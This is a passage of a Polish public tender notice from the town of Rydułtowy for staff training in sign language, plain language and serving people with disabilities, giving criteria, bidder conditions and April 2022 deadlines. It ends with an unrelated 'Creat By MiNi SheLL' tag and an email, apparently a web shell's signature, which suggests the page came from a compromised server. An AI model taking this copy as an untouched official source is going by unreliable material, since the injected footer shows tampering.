przeprowadzenie szkolenia w mniej licznych grupach, dogodnych<br/>dla Wykonawcy, zapewniających efektywne przekazanie wiedzy.<br/>3) Wykonawca zapewni uczestnikom szkolenia wszelkie niezbędne materiały dydaktyczne,<br/>które przechodzą na własność uczestnika kursu.<br/>4) Szkolenie zostanie przeprowadzone w formie stacjonarnej w lokalu nieodpłatnie<br/>udostępnionym przez Zamawiającego na terenie miasta Rydułtowy.<br/>5) Zamawiający zapewni wodę oraz ciepłe napoje (kawa, herbata) podczas szkolenia.<br/>6) Szkolenie jednej grupy kursantów powinno trwać co najmniej 4 godziny zegarowe.<br/>7) Zajęcia muszą odbywać się w formie teoretycznej jak i praktycznej. Wykonawca<br/>wykorzysta między innymi następujące metody szkoleniowe: wykład, symulacje,<br/>odgrywanie scenek, ćwiczenia indywidualne i grupowe, case study.<br/>8) Minimalny zakres szkolenia:<br/>a) zdefiniowanie osoby ze szczególnymi potrzebami.<br/>b) rodzaje niepełnosprawności.<br/>c) obsługa klienta z niepełnosprawnością: ruchową, wzrokową, słuchową, psychiczną,<br/>intelektualną, neurologiczną.<br/>d) asertywność w kontakcie z osobami ze szczególnymi potrzebami.<br/>e) udzielanie pomocy osobom ze szczególnymi potrzebami w sytuacjach zagrożenia życia<br/>i zdrowia.<br/>9) Po zakończeniu szkolenia uczestnicy otrzymają imienny certyfikat potwierdzający<br/>uczestnictwo w szkoleniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80511000-9 - Usługi szkolenia personelu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące: <br/>1. Zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/>2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie<br/>3. Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/>4. Zdolności technicznej lub zawodowej:<br/>1) dla części nr 1:<br/>a) Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą iż wykonali<br/>w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy- w tym<br/>9<br/>okresie co najmniej jedną usługę polegającą na przeprowadzeniu szkolenia lub<br/>warsztatów w wymiarze co najmniej 30 godzinowym obejmującym zajęcia teoretyczne<br/>i praktyczne o tematyce związanej z posługiwaniem się językiem migowym.<br/>b) Zamawiający uzna warunek za spełniony jeżeli Wykonawcy wykażą się dysponowaniem<br/>co najmniej jednym trenerem posiadającym co najmniej wykształcenie wyższe lub<br/>certyfikat lub zaświadczenie uprawniające go do przeprowadzania szkoleń oraz<br/>legitymującym się co najmniej następującym doświadczeniem i wykonaniem w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie co<br/>najmniej jednej usługi polegającej na przeprowadzeniu szkolenia lub warsztatów<br/>w wymiarze co najmniej 30 godzin obejmującym zajęcia teoretyczne i praktyczne<br/>o tematyce związanej z posługiwaniem się językiem migowym.<br/>2) Dla części nr 2<br/>a) Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą iż wykonali<br/>w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy- w tym<br/>okresie co najmniej jedną usługę polegającą na przeprowadzeniu szkolenia lub<br/>warsztatów w wymiarze co najmniej 20 godzin obejmującym zajęcia teoretyczne<br/>i praktyczne o tematyce związanej ze szkoleniem z języka prostego.<br/>b) Zamawiający uzna warunek za spełniony jeżeli Wykonawcy wykażą się dysponowaniem<br/>co najmniej jednym trenerem posiadającym co najmniej wykształcenie wyższe lub<br/>certyfikat lub zaświadczenie uprawniające go do przeprowadzania szkoleń oraz<br/>legitymującym się co najmniej następującym doświadczeniem i wykonaniem w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie co<br/>najmniej jednej usługi polegającej na przeprowadzeniu szkolenia lub warsztatów<br/>obejmującym zajęcia teoretyczne i praktyczne o tematyce związanej ze szkoleniami z<br/>języka prostego.<br/>3) Dla części nr 3 <br/>a) Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą iż wykonali<br/>w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy- w tym<br/>okresie co najmniej jedną usługę polegającą na przeprowadzeniu szkolenia lub<br/>warsztatów obejmującym zajęcia teoretyczne i praktyczne o tematyce związanej ze<br/>szkoleniami z obsługi lub komunikacji z osobami ze szczególnymi potrzebami. <br/>b) Zamawiający uzna warunek za spełniony jeżeli Wykonawcy wykażą się dysponowaniem<br/>co najmniej jednym trenerem posiadającym co najmniej wykształcenie wyższe lub<br/>certyfikat lub zaświadczenie uprawniające go do przeprowadzania szkoleń oraz<br/>legitymującym się co najmniej następującym doświadczeniem i wykonaniem w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie co<br/>najmniej jednej usługi polegającej na przeprowadzeniu szkolenia lub warsztatów<br/>obejmującym zajęcia teoretyczne i praktyczne o tematyce związanej ze szkoleniami<br/>z obsługi lub komunikacji z osobami ze szczególnymi potrzebami. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez Zamawiającego (art. 108 ust. 1 ustawy Pzp).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych<br/>również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania<br/>i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz<br/>załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie<br/>Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy – załącznik nr 6 do SWZ,<br/>2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług szkoleniowych wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia<br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami- załącznik nr 7 do SWZ<br/> Okres 5 letni określony w pkt 1 liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/> Zamawiający przed udzieleniem zamówienia na podstawie przepisu art. 274 ust.1 ustawy Pzp wzywa ww. Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni aktualnych na dzień złożenia podmiotowych środków dowodowych. <br/> 4. Dokumenty, które należy dołączyć do oferty:<br/> 1) formularz oferty – wg wzoru na załączniku nr 1a-c (w zależności od liczby zadań, na które Wykonawca składa ofertę),<br/> 2) oświadczenie, z którego wynika które usługi wykonają poszczególni Wykonawcy występujący wspólnie (uwaga dotyczy tylko konsorcjum spółki cywilnej)- załącznik nr 5,<br/> 3) zobowiązania podmiotów trzecich do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia – dołączyć jeżeli Wykonawca zamierza spełnianie warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych, doświadczenia wykazać wykorzystując zasoby podmiotów trzecich – wzór własny,<br/> 4) pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, albo do reprezentowania w postępowaniu i zawarcia umowy, z którego wynika zakres, tj. określenie do jakich czynności uprawniony jest pełnomocnik – dołączyć, o ile dotyczy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Nie ustanawia się szczególnych wymagań. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dla części I i II w zakresie:<br/>1. Wszelkie zmiany i uzupełnienia treści umowy muszą mieć formę pisemną pod rygorem<br/>nieważności . <br/>2. Wystąpienie co najmniej jednej z okoliczności określonych w ust. 4-5 uprawnia jedną ze stron umowy do<br/>wystąpienia z pisemnym wnioskiem o zmianę umowy wraz z uzasadnieniem. <br/>3. Zmiana postanowień umownych niepowodująca konieczności przeprowadzenia nowego postępowania<br/>jest dopuszczalna w zakresie i na warunkach opisanych w ust. 4-5, a także w razie zaistnienia<br/>przesłanek wynikających z przepisów art. 455 ust.1 pkt 2 – 4 i ust. 2 ustawy Prawo zamówień<br/>publicznych. <br/>4. Zamawiający przewiduje zmianę umowy w zakresie harmonogramu realizacji szkolenia w przypadku: <br/>1) wystąpienia warunków siły wyższej, przez którą należy rozumieć wystąpienie warunków, których<br/>Strony nie były w stanie przewidzieć w szczególności wystąpienie wojny, zamieszek, klęski<br/>żywiołowej lub innego stanu zagrażającego życiu lub zdrowiu, które uniemożliwiły wykonanie umowy<br/>w dotychczas ustalonym terminie. Termin szkolenia może ulec zmianie o czas, w jakim wyżej<br/>wskazane okoliczności wpłynęły na termin wykonania umowy przez Wykonawcę, to jest<br/>uniemożliwiły Wykonawcy terminową realizację przedmiotu umowy określoną w harmonogramie,<br/>2) choroby lub zmiany trenera wskazanego w ofercie, co skutkuje zmianą terminu przeprowadzania<br/>szkolenia o czas nieobecności dotychczasowego trenera albo czas niezbędny na jego zastąpienie<br/>osobą spełniającą warunki określone w ust.5.<br/>5. Dopuszczalna jest zmiana osób (trenera) skierowanych do realizacji szkoleń w odniesieniu do osób<br/>wskazanych przez Wykonawcę na etapie postępowania o udzielenie zamówienia publicznego w sytuacji,<br/>gdy zmiana będzie polegać na zastąpieniu dotychczasowej osoby inną osobą, która będzie posiadać<br/>doświadczenie potwierdzające spełnienie warunków udziału w postępowaniu przez Wykonawcę, lub<br/>gdy Wykonawca otrzymałby w ramach kryterium oceny ofert „Doświadczenie trenera” co najmniej tyle<br/>samo punktów za doświadczenie i kwalifikacje zastępującej osoby, co osoby wskazanej w ofercie<br/>Dla części III:<br/>Jak wyżej za wyjątkiem ustępu 4:<br/> 4. Zamawiający przewiduje zmianę umowy w terminie określonym w §3 ust. 2 realizacji szkolenia<br/>w przypadku: <br/> 1) wystąpienia warunków siły wyższej, przez którą należy rozumieć wystąpienie warunków, których Strony nie były w stanie przewidzieć w szczególności wystąpienie wojny, zamieszek, klęski żywiołowej lub innego stanu zagrażającego życiu lub zdrowiu, które uniemożliwiły wykonanie umowy w dotychczas ustalonym terminie. Termin szkolenia może ulec zmianie o czas, w jakim wyżej wskazane okoliczności wpłynęły na termin wykonania umowy przez Wykonawcę, to jest uniemożliwiły Wykonawcy terminową realizację przedmiotu umowy,<br/> 2) choroby lub zmiany trenera wskazanego w ofercie, co skutkuje zmianą terminu przeprowadzania szkolenia o czas nieobecności dotychczasowego trenera albo czas niezbędny na jego zastąpienie osobą spełniającą warunki określone w ust.5. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-29 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-29 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Przedmiotem zamówienia jest realizacja kompleksowej usługi szkoleniowej skierowanej do pracowników Urzędu Miasta Rydułtowy oraz miejskich jednostek organizacyjnych. Przedmiot zamówienia został podzielony na trzy części:<br/> 1) Część I: Dostępność informacyjno-komunikacyjna – szkolenie z Polskiego Języka Migowego.<br/> 2) Część II: Dostępność informacyjno-komunikacyjna – szkolenie z języka prostego.<br/> 3) Część III: Dostępność informacyjno-komunikacyjna – szkolenie z obsługi osób z niepełnosprawnościami.<br/> 2. Zamawiający opisując przedmiot zamówienia uwzględnił nazwy i kody określone we Wspólnym Słowniku Zamówień (CPV):<br/> 1) 80500000-9 Usługi szkoleniowe,<br/> 2) 80511000-9 Usługi szkolenia personelu.<br/> 3. Kompleksowe usługi szkoleniowe obejmują zapewnienie doświadczonej kadry trenerskiej, niezbędnego sprzętu, materiałów zużywalnych (jeśli dotyczy danego szkolenia), materiałów merytorycznych/dydaktycznych a także zorganizowanie egzaminu niezbędnego do otrzymania certyfikatu poświadczającego zdobyte kwalifikacje (jeśli dotyczy danego szkolenia) oraz wydanie po zrealizowanej usłudze certyfikatów/zaświadczeń o ukończeniu szkolenia.<br/> 4. Podczas realizacji usługi szkoleniowej Wykonawca zobowiązany jest do wdrożenia wszystkich obowiązujących w danym okresie zasad/przepisów bezpieczeństwa, które wynikają z nałożonego przepisami prawa reżimu sanitarnego określonego dla branży, w której działa mającego na celu zapobieganie, przeciwdziałanie i zwalczanie COVID-19. Wdrożone wymagania reżimu sanitarnego stosowane będą wobec wszystkich osób uczestniczących w danych zajęciach.<br/> 5. Zajęcia muszą odbywać się w formie teoretycznej jak i praktycznej. <br/> 6. Szczegółowy Harmonogram szkolenia Wykonawca ustali z Zamawiającym przed podpisaniem umowy. Harmonogram zajęć zawierać będzie informacje dotyczące podziału materiału szkoleniowego na poszczególne dni i godziny oraz wskazanie trenera/trenerów (dotyczy części 1 i 2).<br/> 7. Wykonawca zobowiązuje się do zapewnienia sprawnej obsługi logistycznej zajęć. <br/> 8. Zamawiający informuje, iż nie ubezpiecza Uczestników/Uczestniczek podczas zajęć od NNW.<br/><br/>Zamawiający wykluczy również Wykonawcę na podstawie przepisu art. 7 ust 1 ustawy w celu przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022 r.<br/><br/>Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.<br/>Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z § 4 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający do wykonawcy (Dz. U. poz. 2415).

Creat By MiNi SheLL
Email: jattceo@gmail.com